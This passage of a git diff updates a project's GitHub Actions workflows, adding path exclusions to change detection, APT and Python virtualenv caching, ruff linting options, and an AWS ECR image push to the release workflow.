+ 6. **Save pip cache** - This step uses [**save_pip_cache**](../actions/python_requirements/save_pip_cache/README.md) action to save pip's download cache on GitHub.
+ 7. **Create virtual environment cache** - This step uses [**save_virtualenv**](../actions/python_requirements/save_virtualenv/README.md) action to save virtual environment on GitHub's cache.
+
+## [CI](pull_request_automation.yml)
+
+This workflow runs in the case of a **pull request on branches *master*, *main*, *develop*, *dev*** and it's the core CI workflow.
+
+It is composed of three jobs:
+
+1. **detect-changes** - This job detects and enumerates changes to backend and/or frontend files. To do so, it uses the [**_detect_changes**](_detect_changes.yml) workflow.
+2. **node** - If any changes to the frontend files are found, [**_node**](_node.yml) workflow is run.
+3. **python** - If any changes to the backend files are found, [**_python**](_python.yml) workflow is run.
+
+## [Release and publish](release.yml)
+
+TODO
+
+## [Reusable release and tag workflow](_release_and_tag.yml)
+
+TODO
diff --git a/.github/workflows/_detect_changes.yml b/.github/workflows/_detect_changes.yml
index efaffa05..9e9b8a65 100644
--- a/.github/workflows/_detect_changes.yml
+++ b/.github/workflows/_detect_changes.yml
@@ -3,16 +3,24 @@ on:
workflow_call:
inputs:
backend_directories:
- description: Backend directories separated by spaces
+ description: Space separated list of backend directories
+ required: false
+ type: string
+
+ backend_exclusions:
+ description: Space separated list of Backend directories or files to be excluded
required: false
type: string
- default: ''
frontend_directories:
- description: Frontend directories separated by spaces
+ description: Space separated list of frontend directories
+ required: false
+ type: string
+
+ frontend_exclusions:
+ description: Space separated list of frontend directories or files to be excluded
required: false
type: string
- default: ''
ubuntu_version:
description: Ubuntu version to use
@@ -37,13 +45,16 @@ jobs:
backend: ${{steps.diff_check_backend.outputs.backend}}
frontend: ${{steps.diff_check_frontend.outputs.frontend}}
steps:
- - uses: actions/checkout@v4
+ - name: Check out PR target branch
+ uses: actions/checkout@v4
with:
ref: ${{ github.base_ref }}
- - uses: actions/checkout@v4
+ - name: Check out source branch latest commit
+ uses: actions/checkout@v4
with:
clean: false
+
- name: Generate summary
if: ${{inputs.backend_directories != ''}} | ${{inputs.frontend_directories != ''}}
run: |
@@ -54,18 +65,34 @@ jobs:
if: ${{inputs.backend_directories != ''}}
id: diff_check_backend
run: |
- BACKEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} | head -n -1 | wc -l)
+ BACKEND_EXCLUSIONS=""
+ if ${{ inputs.backend_exclusions != ''}}; then
+ for exclusion in ${{ inputs.backend_exclusions }}; do
+ BACKEND_EXCLUSIONS+=":(glob,exclude)$exclusion "
+ done
+ fi
+ # No need to add other quotes since they will already be added.
+ BACKEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS | head -n -1 | wc -l)
echo "backend=$BACKEND_CHANGES" >> $GITHUB_OUTPUT
echo "Backend Changes: $BACKEND_CHANGES" >> $GITHUB_STEP_SUMMARY
+ echo "::debug::diff command:git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS"
+ echo "::debug::diff command results: $(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $BACKEND_EXCLUSIONS | head -n -1 )"
echo "backend $BACKEND_CHANGES"
-
- name: Generate diffs for frontend
if: ${{inputs.frontend_directories != ''}}
id: diff_check_frontend
run: |
- FRONTEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.frontend_directories }} | head -n -1 | wc -l)
+ FRONTEND_EXCLUSIONS=""
+ if ${{ inputs.frontend_exclusions != ''}}; then
+ for exclusion in ${{ inputs.frontend_exclusions }}; do
+ FRONTEND_EXCLUSIONS+=":(glob,exclude)$exclusion "
+ done
+ fi
+ FRONTEND_CHANGES=$(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.frontend_directories }} $FRONTEND_EXCLUSIONS | head -n -1 | wc -l)
echo "frontend=$FRONTEND_CHANGES" >> $GITHUB_OUTPUT
echo "Frontend Changes: $FRONTEND_CHANGES" >> $GITHUB_STEP_SUMMARY
+ echo "::debug::diff command:git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $FRONTEND_EXCLUSIONS"
+ echo "::debug::diff command results: $(git diff --compact-summary origin/${{ github.base_ref }} -- ${{ inputs.backend_directories }} $FRONTEND_EXCLUSIONS | head -n -1 )"
echo "frontend $FRONTEND_CHANGES"
diff --git a/.github/workflows/_node.yml b/.github/workflows/_node.yml
index 97d8980d..074bbe15 100644
--- a/.github/workflows/_node.yml
+++ b/.github/workflows/_node.yml
@@ -88,7 +88,8 @@ jobs:
node_version: ${{ fromJson(inputs.node_versions) }}
language: ['javascript']
steps:
- - uses: actions/checkout@v4
+ - name: Check out latest commit for current branch
+ uses: actions/checkout@v4
- name: Set up Node.js
uses: actions/setup-node@v4
@@ -102,7 +103,7 @@ jobs:
if [[ '${{ inputs.use_jest }}' != 'false' ]]; then
npm i -D --package-lock-only jest @testing-library/jest-dom babel-jest @babel/core @babel/preset-env
if [[ '${{ inputs.use_react }}' != 'false' ]]; then
- npm i -D --package-lock-only @testing-library/react @testing-library/jest-dom
+ npm i -D --package-lock-only @testing-library/react
fi
fi
if [[ '${{ inputs.use_eslint }}' != 'false' ]]; then
@@ -124,10 +125,10 @@ jobs:
uses: ./.github/actions/node_linter
with:
working_directory: ${{ inputs.working_directory }}
- use_eslint: ${{ inputs.use_eslint == true }}
- use_prettier: ${{ inputs.use_prettier == true }}
- use_stylelint: ${{ inputs.use_stylelint == true }}
- check_packages_licenses: ${{ inputs.check_packages_licenses == true }}
+ use_eslint: ${{ inputs.use_eslint }}
+ use_prettier: ${{ inputs.use_prettier }}
+ use_stylelint: ${{ inputs.use_stylelint }}
+ check_packages_licenses: ${{ inputs.check_packages_licenses }}
- name: Check packages licenses
if: ${{ inputs.check_packages_licenses }}
@@ -138,7 +139,7 @@ jobs:
requirements: ${{ inputs.requirements_path }}
external: ${{ inputs.working_directory }}/licenses.csv
external-format: csv
- table-headers: true
+ headers: true
fail: 'StrongCopyleft,NetworkCopyleft,Error'
fails-only: true
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index d24cd1b4..8c5c39f4 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -2,168 +2,167 @@ name: Reusable python linter workflow
on:
workflow_call:
inputs:
+ # Base configs
python_versions:
- description: Python versions to use
+ description: Python versions to use (in the form of a JSON array)
type: string
required: true
+ ubuntu_version:
+ description: Ubuntu version to use
+ type: string
+ default: latest
+ required: false
working_directory:
description: Directory that must be run against the linters
type: string
required: true
-
- use_autoflake:
- description: Use autoflake linter
- default: false
- type: boolean
+ requirements_path:
+ description: Path to the requirements.txt file
+ type: string
+ required: true
+ install_from:
+ description: Directory that must be used to install the packages
+ type: string
required: false
+ default: .
+ packages_path:
+ description: Path to the packages.txt file (APT requirements)
+ type: string
+ required: false
+ env:
+ description: Environment variables to set
+ type: string
+ required: false
+ default: >-
+ {}
+ max_timeout:
+ description: Max time that the CI can be run
+ type: number
+ required: false
+ default: 30
+
+ # Formatters
use_black:
description: Use black formatter
- default: false
type: boolean
required: false
use_isort:
description: Use isort formatter
- default: false
type: boolean
required: false
- use_flake8:
- description: Use flake8 linter
- default: false
+ use_ruff_formatter:
+ description: Use ruff formatter
type: boolean
required: false
- use_pylint:
- description: Use pylint linter
- default: false
+
+ # Linters
+ use_autoflake:
+ description: Use autoflake linter
type: boolean
required: false
use_bandit:
description: Use bandit linter
- default: false
type: boolean
required: false
-
- run_codeql:
- description: Run codeql
- default: false
+ use_flake8:
+ description: Use flake8 linter
type: boolean
required: false
-
- requirements_path:
- description: Path to the requirements.txt file
- type: string
- required: true
-
- install_from:
- description: Directory that must be used to install the packages
- type: string
+ use_pylint:
+ description: Use pylint linter
+ type: boolean
required: false
- default: .
-
- packages_path:
- description: Path to the packages.txt file
- type: string
+ use_ruff_linter:
+ description: Use ruff linter
+ type: boolean
required: false
- custom_command:
- description: String of custom command to run
- type: string
+ # Coverage configs
+ use_coverage:
+ description: Use coverage.py.
+ type: boolean
required: false
- django_settings_module:
- description: Path to the django settings file
+ coverage_config_path:
+ description: Path to the coverage.py config file
type: string
required: false
- default: ''
-
- check_migrations:
- description: Check if migrations are valid. Require django_settings_module to be set.
- type: boolean
- required: false
- default: false
- check_requirements_licenses:
- description: Check if requirements have a valid license. Require django_settings_module to be set.
+ default: .coveragerc
+ upload_coverage:
+ description: Upload coverage.py report to github
type: boolean
required: false
- default: true
- ignore_requirements_licenses_regex:
- description: Regex of repositories of which ignore license
- type: string
- required: false
- default: uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*
- check_docs_directory:
- description: Check docs using rstcheck inside this directory
- type: string
- required: false
- default: ''
- check_dockerfile:
- description: Check dockerfile build. WARNING action total time may increase significantly
- type: string
+ # CodeQL configs
+ run_codeql:
+ description: Run codeql
+ type: boolean
required: false
- default: ''
-
- use_postgres:
- description: Use postgres service
- default: false
+
+ # Services
+ use_celery:
+ description: Create a celery worker
type: boolean
required: false
use_elastic_search:
description: Use elastic_search service
- default: false
type: boolean
required: false
use_memcached:
description: Use memcached service
- default: false
type: boolean
required: false
- use_redis:
- description: Use redis service
- default: false
+ use_mongo:
+ description: Use mongo service
type: boolean
required: false
- use_rabbitmq:
- description: Use rabbitmq service
- default: false
+ use_postgres:
+ description: Use postgres service
type: boolean
required: false
- use_mongo:
- description: Use mongo service
- default: false
+ use_rabbitmq:
+ description: Use rabbitmq service
type: boolean
required: false
- use_celery:
- description: Create a celery worker
- default: false
+ use_redis:
+ description: Use redis service
type: boolean
required: false
- use_coverage:
- description: Use coverage.py.
- default: false
- type: boolean
+ # Services configs
+ ## Celery service configs
+ celery_app:
+ description: Celery app name. Requires use_celery to be true
+ type: string
required: false
- coverage_config_path:
- description: Path to the coverage.py config file
+ celery_queues:
+ description: Celery queues separated by ,. Requires use_celery to be true
type: string
required: false
- default: .coveragerc
- upload_coverage:
- description: Upload coverage.py report to github
- default: false
- type: boolean
+ default: default
+ ## Elasticsearch service configs
+ elasticsearch_version:
+ description: Elasticsearch container version
+ type: string
required: false
-
- tags_for_slow_tests:
- description: Tags for tests that will be run only on master/main branch, space separated. Can be used only for django projects.
- default: slow
+ default: latest
+ elasticsearch_port:
+ description: Elasticsearch container port
type: string
required: false
- tags_for_manual_tests:
- description: Tags for tests that will not be run on the CI, space separated. Can be used only for django projects.
- default: manual
+ default: 9200
+ ## Memcached service configs
+ memcached_version:
+ description: Memcached alpine container version
type: string
required: false
-
+ default: latest
+ ## Mongo service configs
+ mongo_version:
+ description: Mongo container version
+ type: string
+ required: false
+ default: latest
+ ## Postgres service configs
postgres_db:
description: Postgres service db. Requires use_postgres to be true
type: string
@@ -184,66 +183,63 @@ on:
type: string
required: false
default: latest
-
- mongo_version:
- description: Mongo container version
+ ## RabbitMQ service configs
+ rabbitmq_version:
+ description: RabbitMQ management-alpine container version
type: string
required: false
default: latest
- elasticsearch_version:
- description: Elasticsearch container version
+ ## Redis service configs
+ redis_version:
+ description: Redis alpine container version
type: string
required: false
- default: 8.11.1
- elasticsearch_port:
- description: Elasticsearch container port
+ default: latest
+
+
+ # Django configs
+ django_settings_module:
+ description: Path to the django settings file
type: string
required: false
- default: 9200
- memcached_version:
- description: Memcached alpine container version
- type: string
+ check_migrations:
+ description: Check if migrations are valid. Require django_settings_module to be set.
+ type: boolean
required: false
- default: latest
- redis_version:
- description: Redis alpine container version
- type: string
+ check_requirements_licenses:
+ description: Check if requirements have a valid license. Require django_settings_module to be set.
+ type: boolean
required: false
- default: latest
- rabbitmq_version:
- description: RabbitMQ management-alpine container version
+ default: true
+ ignore_requirements_licenses_regex:
+ description: Regex of repositories of which ignore license
type: string
required: false
- default: 3
-
- celery_app:
- description: Celery app name. Requires use_celery to be true
+ default: uWSGI.*|lunardate.*|.*QuokkaClient.*|pyquokka.*
+ tags_for_slow_tests:
+ description: Tags for tests that will be run only on master/main branch, space separated. Can be used only for django projects.
+ default: slow
type: string
required: false
-
- celery_queues:
- description: Celery queues separated by ,. Requires use_celery to be true
+ tags_for_manual_tests:
+ description: Tags for tests that will not be run on the CI, space separated. Can be used only for django projects.
+ default: manual
type: string
required: false
- default: default
- env:
- description: Environment variables to set
+ # Misc configs
+ custom_command:
+ description: String of custom command to run
type: string
required: false
- default: >-
- {}
- max_timeout:
- description: Max time that the CI can be run
- type: number
+ check_docs_directory:
+ description: Check docs using rstcheck inside this directory
+ type: string
required: false
- default: 30
-
- ubuntu_version:
- description: Ubuntu version to use
+ check_dockerfile:
+ description: Check dockerfile build. WARNING action total time may increase significantly
type: string
- default: latest
required: false
jobs:
@@ -257,10 +253,11 @@ jobs:
language: ['python']
env: ${{ fromJson(inputs.env) }}
steps:
- - uses: actions/checkout@v4
+ - name: Check out latest commit
+ uses: actions/checkout@v4
- name: Set up Python
- uses: actions/setup-python@v4
+ uses: actions/setup-python@v5
with:
python-version: ${{ matrix.python_version }}
@@ -276,21 +273,133 @@ jobs:
shell:
bash
- - name: Install apt requirements
- if: inputs.packages_path
- uses: ./.github/actions/apt_requirements
+ - name: Restore APT cache related to PR event
+ id: restore_apt_cache_pr
+ uses: ./.github/actions/apt_requirements/restore_apt_cache
+ with:
+ apt_requirements_file_path: ${{ inputs.packages_path }}
+
+ - name: Restore APT cache related to target branch
+ id: restore_apt_cache_target_branch
+ if: steps.restore_apt_cache_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/apt_requirements/restore_apt_cache
+ with:
+ apt_requirements_file_path: ${{ inputs.packages_path }}
+ git_reference: ${{ github.base_ref }}
+
+ - name: Refresh APT repositories
+ if: >
+ steps.restore_apt_cache_pr.outputs.cache-hit != 'true' &&
+ steps.restore_apt_cache_target_branch.outputs.cache-hit != 'true'
+ run: |
+ sudo apt-get update
+ shell: bash
+
+ - name: Install APT requirements
+ run: |
+ sudo apt-get install -y --no-install-recommends $(tr '\n' ' ' < ${{ inputs.packages_path }})
+ shell: bash
+
+ - name: Save APT cache related to PR event
+ if: >
+ steps.restore_apt_cache_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/apt_requirements/save_apt_cache
with:
- requirements_file: ${{ inputs.packages_path }}
+ apt_requirements_file_path: ${{ inputs.packages_path }}
+
+ - name: Create linter requirements file
+ uses: ./.github/actions/python_requirements/create_linter_requirements_file
+ with:
+ install_from: ${{ inputs.install_from }}
+ django_settings_module: ${{ inputs.django_settings_module }}
+ use_autoflake: ${{ inputs.use_autoflake }}
+ use_bandit: ${{ inputs.use_bandit }}
+ use_black: ${{ inputs.use_black }}
+ use_flake8: ${{ inputs.use_flake8 }}
+ use_isort: ${{ inputs.use_isort }}
+ use_pylint: ${{ inputs.use_pylint }}
+ use_ruff_formatter: ${{ inputs.use_ruff_formatter }}
+ use_ruff_linter: ${{ inputs.use_ruff_linter }}
+
+ - name: Create dev requirements file
+ uses: ./.github/actions/python_requirements/create_dev_requirements_file
+ with:
+ install_from: ${{ inputs.install_from }}
+ use_coverage: ${{ inputs.use_coverage }}
+
+ - name: Create docs requirements file
+ uses: ./.github/actions/python_requirements/create_docs_requirements_file
+ with:
+ install_from: ${{ inputs.install_from }}
+ check_docs_directory: ${{ inputs.check_docs_directory }}
+ django_settings_module: ${{ inputs.django_settings_module }}
+
+ - name: Restore Python virtual environment related to PR event
+ id: restore_python_virtual_environment_pr
+ uses: ./.github/actions/python_requirements/restore_virtualenv/
+ with:
+ requirements_paths: "${{ inputs.requirements_path }} requirements-linters.txt requirements-dev.txt requirements-docs.txt"
+
+ - name: Restore Python virtual environment related to target branch
+ id: restore_python_virtual_environment_target_branch
+ if: steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/restore_virtualenv/
+ with:
+ requirements_paths: ${{ inputs.requirements_path }}
+ git_reference: ${{ github.base_ref }}
+
+ - name: Create Python virtual environment
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+ steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/create_virtualenv
+
+ - name: Restore pip cache related to PR event
+ id: restore_pip_cache_pr
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+ steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/restore_pip_cache
+
+ - name: Restore pip cache related to target branch
+ id: restore_pip_cache_target_branch
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+ steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true' &&
+ steps.restore_pip_cache_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/restore_pip_cache
+ with:
+ git_reference: ${{ github.base_ref }}
+
+ - name: Install project requirements
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+ steps.restore_python_virtual_environment_target_branch.outputs.cache-hit != 'true'
+ run: pip install -r ${{ inputs.requirements_path }}
+ shell: bash
+ working-directory: ${{ inputs.install_from }}
+
+ - name: Install other requirements
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+ run: |
+ pip install -r requirements-dev.txt
+ pip install -r requirements-linters.txt
+ pip install -r requirements-docs.txt
+ shell: bash
+ working-directory: ${{ inputs.install_from }}
- name: Check requirements licenses
- if: inputs.check_requirements_licenses && steps.cache-virtualenv.outputs.cache-hit != 'true'
+ if: >
+ inputs.check_requirements_licenses &&
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
id: license_check_report
continue-on-error: true
uses: pilosus/action-pip-license-checker@v2
with:
requirements: ${{ inputs.install_from }}/${{ inputs.requirements_path }}
exclude: ${{ inputs.ignore_requirements_licenses_regex }}
- table-headers: true
+ headers: true
fail: 'StrongCopyleft,NetworkCopyleft,Error'
fails-only: true
@@ -304,102 +413,30 @@ jobs:
exit 1
shell: bash
- # not the best solution because i do not think that dependabot supports this
- - name: Create requirements-linters.txt
- run: |
- echo > requirements-linters.txt
-
- if [[ '${{ inputs.use_black}}' != 'false' ]]; then
- echo "black==23.11.0" >> requirements-linters.txt
- fi
-
- if [[ '${{ inputs.use_isort}}' != 'false' ]]; then
- echo "isort==5.12.0" >> requirements-linters.txt
- fi
-
- if [[ '${{ inputs.use_flake8}}' != 'false' ]]; then
- echo "flake8==6.1.0" >> requirements-linters.txt
- if [[ -n '${{ inputs.django_settings_module }}' ]]; then
- echo "flake8-django==1.4" >> requirements-linters.txt
- fi
- fi
-
- if [[ '${{ inputs.use_pylint}}' != 'false' ]]; then
- echo "pylint==2.17.7" >> requirements-linters.txt
- if [[ -n '${{ inputs.django_settings_module }}' ]]; then
- echo "pylint-django==2.5.5" >> requirements-linters.txt
- fi
- fi
-
- if [[ '${{ inputs.use_bandit}}' != 'false' ]]; then
- echo "bandit==1.7.5" >> requirements-linters.txt
- fi
- if [[ '${{ inputs.use_autoflake}}' != 'false' ]]; then
- echo "autoflake==2.2.1" >> requirements-linters.txt
- fi
- cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-linter.txt/') >> requirements-linters.txt 2>/dev/null || exit 0
- shell: bash
- working-directory: ${{ inputs.install_from }}
-
- - name: Create requirements-dev.txt
- run: |
- echo > requirements-dev.txt
- if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
- echo "coverage>=7.3.2" >> requirements-dev.txt
- fi
- cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-dev.txt/') >> requirements-dev.txt 2>/dev/null || exit 0
- shell: bash
- working-directory: ${{ inputs.install_from }}
-
- - name: Create requirements-docs.txt
- run: |
- echo > requirements-docs.txt
- if [[ -n '${{ inputs.check_docs_directory }}' ]]; then
- echo "rstcheck[sphinx]" >> requirements-docs.txt
- echo "sphinx==7.2.6" >> requirements-docs.txt
- echo "sphinx_rtd_theme==1.3.0" >> requirements-docs.txt
- echo "sphinxcontrib-spelling==8.0.0" >> requirements-docs.txt
- if [[ -n '${{ inputs.django_settings_module }}' ]]; then
- echo "sphinxcontrib-django2==1.9" >> requirements-docs.txt
- fi
- cat $(echo ${{ inputs.requirements_path }} | sed -e 's/.txt/-docs.txt/') >> requirements-docs.txt 2>/dev/null || exit 0
- fi
- shell: bash
- working-directory: ${{ inputs.install_from }}
-
- - name: Check virtualenv cache
- uses: syphar/restore-virtualenv@v1
- id: cache-virtualenv
+ - name: Save Python virtual environment related to PR event
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/save_virtualenv
with:
- requirement_files: |
- ${{ inputs.install_from }}/${{ inputs.requirements_path }}
- ${{ inputs.install_from }}/requirements-dev.txt
- ${{ inputs.install_from }}/requirements-linters.txt
- ${{ inputs.install_from }}/requirements-docs.txt
-
- - name: Check pip cache
- uses: syphar/restore-pip-download-cache@v1
- if: steps.cache-virtualenv.outputs.cache-hit != 'true'
- with:
- requirement_files: |
- ${{ inputs.install_from }}/${{ inputs.requirements_path }}
- ${{ inputs.install_from }}/requirements-dev.txt
- ${{ inputs.install_from }}/requirements-linters.txt
- ${{ inputs.install_from }}/requirements-docs.txt
-
- - name: Install requirements
- if: steps.cache-virtualenv.outputs.cache-hit != 'true'
- run: |
- pip install -r ${{ inputs.requirements_path }}
- pip install -r requirements-dev.txt
- pip install -r requirements-linters.txt
- pip install -r requirements-docs.txt
- shell: bash
- working-directory: ${{ inputs.install_from }}
+ requirements_paths: "${{ inputs.requirements_path }} requirements-linters.txt requirements-dev.txt requirements-docs.txt"
+
+ - name: Save pip cache related to PR event
+ if: >
+ steps.restore_python_virtual_environment_pr.outputs.cache-hit != 'true' &&
+ steps.restore_pip_cache_pr.outputs.cache-hit != 'true'
+ uses: ./.github/actions/python_requirements/save_pip_cache
- name: Run linters
uses: ./.github/actions/python_linter
- if: inputs.use_black || inputs.use_isort || inputs.use_flake8 || inputs.use_pylint || inputs.use_bandit || inputs.use_autoflake
+ if: >
+ inputs.use_black ||
+ inputs.use_isort ||
+ inputs.use_flake8 ||
+ inputs.use_pylint ||
+ inputs.use_bandit ||
+ inputs.use_autoflake ||
+ inputs.use_ruff_formatter ||
+ inputs.use_ruff_linter
with:
working_directory: ${{ inputs.working_directory }}
use_black: ${{ inputs.use_black }}
@@ -408,6 +445,8 @@ jobs:
use_pylint: ${{ inputs.use_pylint }}
use_bandit: ${{ inputs.use_bandit }}
use_autoflake: ${{ inputs.use_autoflake }}
+ use_ruff_formatter: ${{ inputs.use_ruff_formatter }}
+ use_ruff_linter: ${{ inputs.use_ruff_linter }}
- name: Run CodeQL
if: inputs.run_codeql
@@ -424,12 +463,6 @@ jobs:
shell: bash
working-directory: ${{ inputs.check_docs_directory }}
- - name: Build DockerFile
- if: inputs.check_dockerfile
- run: |
- docker build -f ${{ inputs.check_dockerfile }} .
- working-directory: ${{ inputs.working_directory }}
-
- name: Start services
uses: ./.github/actions/services
if: inputs.use_postgres || inputs.use_elastic_search || inputs.use_memcached || inputs.use_redis || inputs.use_rabbitmq || inputs.use_mongo
diff --git a/.github/workflows/_release_and_tag.yml b/.github/workflows/_release_and_tag.yml
index acc8181f..92bf029e 100644
--- a/.github/workflows/_release_and_tag.yml
+++ b/.github/workflows/_release_and_tag.yml
@@ -31,11 +31,40 @@ on:
required: false
default: #CyberSecurity
+ publish_on_ecr:
+ description: Publish on ecr
+ type: boolean
+ required: false
+ default: false
+ repository:
+ description: Repository name
+ type: string
+ required: false
+ default: ${{ github.event.repository.name }}
+
+ dockerfiles:
+ description: Path for dockerfiles from working directory
+ type: string
+ required: false
+ working_directory:
+ description: Docker build context
+ type: string
+ required: false
+ default: .
+ aws_region:
+ description: Aws region
+ type: string
+ required: false
+ default: eu-central-1
+
+
jobs:
release_and_tag:
name: Create release and tag
runs-on: ubuntu-latest
- if: github.event.pull_request.merged == true && ( github.base_ref == 'master' || github.base_ref == 'main' )
+ if: github.event.pull_request.merged == true
+ outputs:
+ match: ${{ steps.check-tag.outputs.match }}
steps:
- uses: actions/checkout@v4
with:
@@ -43,6 +72,7 @@ jobs:
- name: Check Tag
id: check-tag
+ if: github.base_ref == 'master' || github.base_ref == 'main'
run: |
if [[ "${{ github.event.pull_request.title }}" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
echo "match=true" >> $GITHUB_OUTPUT
@@ -51,7 +81,7 @@ jobs:
- name: Create Tag and Release
id: create-release
if: steps.check-tag.outputs.match == 'true'
- uses: softprops/action-gh-release@v1
+ uses: softprops/action-gh-release@v2
with:
tag_name: ${{ github.event.pull_request.title }}
name: Version ${{ github.event.pull_request.title }}
@@ -67,7 +97,7 @@ jobs:
with:
fetch-depth: 0 # otherwise, you do not retrieve the tags
- - uses: actions/setup-python@v4
+ - uses: actions/setup-python@v5
if: steps.check-tag.outputs.match == 'true' && (inputs.publish_on_pypi || inputs.publish_on_test_pypi)
with:
python-version: "3.x"
@@ -115,4 +145,42 @@ jobs:
api_key: ${{ secrets.TWITTER_API_KEY }}
api_key_secret: ${{ secrets.TWITTER_API_KEY_SECRET }}
access_token: ${{ secrets.TWITTER_ACCESS_TOKEN }}
- access_token_secret: ${{ secrets.TWITTER_ACCESS_TOKEN_SECRET }}
\ No newline at end of file
+ access_token_secret: ${{ secrets.TWITTER_ACCESS_TOKEN_SECRET }}
+
+
+ push_on_ecr:
+ runs-on: ubuntu-latest
+ needs: release_and_tag
+ if: github.event.pull_request.merged == true && inputs.publish_on_ecr == true
+ strategy:
+ matrix:
+ dockerfile: ${{ fromJson(inputs.dockerfiles) }}
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0 # otherwise, you do not retrieve the tags
+ - name: Push on ecr branch
+ uses: ./.github/actions/push_on_ecr
+ if: github.base_ref == 'master' || github.base_ref == 'main' || github.base_ref == 'develop' || github.base_ref == 'dev'
+ with:
+ repository: ${{ inputs.repository }}
+ aws_account_id: ${{ secrets.AWS_ACCOUNT_ID }}
+ aws_access_key: ${{ secrets.AWS_ACCESS_KEY}}
+ aws_secret_access_key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+ dockerfile: ${{ matrix.dockerfile }}
+ image_tag: ${{ ( github.base_ref == 'main' || github.base_ref == 'master' ) && 'prod' || 'stag' }}
+ aws_region: ${{ inputs.aws_region }}
+ working_directory: ${{ inputs.working_directory }}
+
+ - name: Push on ecr new release
+ if: needs.release_and_tag.outputs.match == 'true' && (github.base_ref == 'master' || github.base_ref == 'main' )
+ uses: ./.github/actions/push_on_ecr
+ with:
+ repository: ${{ inputs.repository }}
+ aws_account_id: ${{ secrets.AWS_ACCOUNT_ID }}
+ aws_access_key: ${{ secrets.AWS_ACCESS_KEY}}
+ aws_secret_access_key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+ dockerfile: ${{ inputs.dockerfile }}
+ image_tag: ${{ github.event.pull_request.title }}
+ aws_region: ${{ inputs.aws_region }}
+ working_directory: ${{ inputs.working_directory }}
\ No newline at end of file
diff --git a/.github/workflows/create_apt_cache.yaml b/.github/workflows/create_apt_cache.yaml
new file mode 100644
index 00000000..9bd5fd73
--- /dev/null
+++ b/.github/workflows/create_apt_cache.yaml
@@ -0,0 +1,38 @@
+name: Create APT cache
+
+# GitHub will remove any cache entries that have not been accessed in over 7 days.
+
+on:
+ push:
+ branches:
+ - main
+ - master
+ - develop
+ - dev
+ paths:
+ # Path to APT requirements file
+ - '.github/test/python_test/packages.txt'
+
+# discard previous execution if you commit to a branch that is already running
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
+
+jobs:
+ create-cache:
+ name: Create cache for APT dependencies
+ runs-on: ubuntu-latest
+ steps:
+ - name: Check out latest commit on current branch
+ uses: actions/checkout@v4
+
+ # Remember to set the same APT requirements file path set before!
+ - name: Install APT dependencies
+ run: |
+ sudo apt-get update
+ sudo apt-get -y install --no-install-recommends $(tr '\n' ' ' < .github/test/python_test/packages.txt)
+
+ - name: Save APT cache
+ uses: ./.github/actions/apt_requirements/save_apt_cache
+ with:
+ apt_requirements_file_path: .github/test/python_test/packages.txt
diff --git a/.github/workflows/create_python_cache.yaml b/.github/workflows/create_python_cache.yaml
new file mode 100644
index 00000000..8db85f48
--- /dev/null
+++ b/.github/workflows/create_python_cache.yaml
@@ -0,0 +1,55 @@
+name: Create Python cache
+
+# GitHub will remove any cache entries that have not been accessed in over 7 days.
+
+# Only project dependencies will be cached here
+
+on:
+ push:
+ branches:
+ - main
+ - master
+ - develop
+ - dev
+ paths:
+ - '.github/test/python_test/requirements.txt'
+
+# discard previous execution if you commit to a branch that is already running
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
+
+jobs:
+ create-python-cache:
+ name: Create cache for Python dependencies
+ runs-on: ubuntu-latest
+ steps:
+ - name: Check out latest commit
+ uses: actions/checkout@v4
+
+ # Uncomment only if necessary
+ #- name: Install system dependencies required by Python packages
+ # run: |
+ # sudo apt-get update && sudo apt install ...
+
+ - name: Set up Python
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.12"
+
+ - name: Set up Python virtual environment
+ uses: ./.github/actions/python_requirements/create_virtualenv
+
+ - name: Install Python dependencies
+ run: |
+ pip install -r .github/test/python_test/requirements.txt
+ working-directory: "."
+
+ - name: Save pip cache
+ uses: ./.github/actions/python_requirements/save_pip_cache
+
+ - name: Create virtual environment cache
+ uses: ./.github/actions/python_requirements/save_virtualenv
+ with:
+ requirements_paths: .github/test/python_test/requirements.txt
+
diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
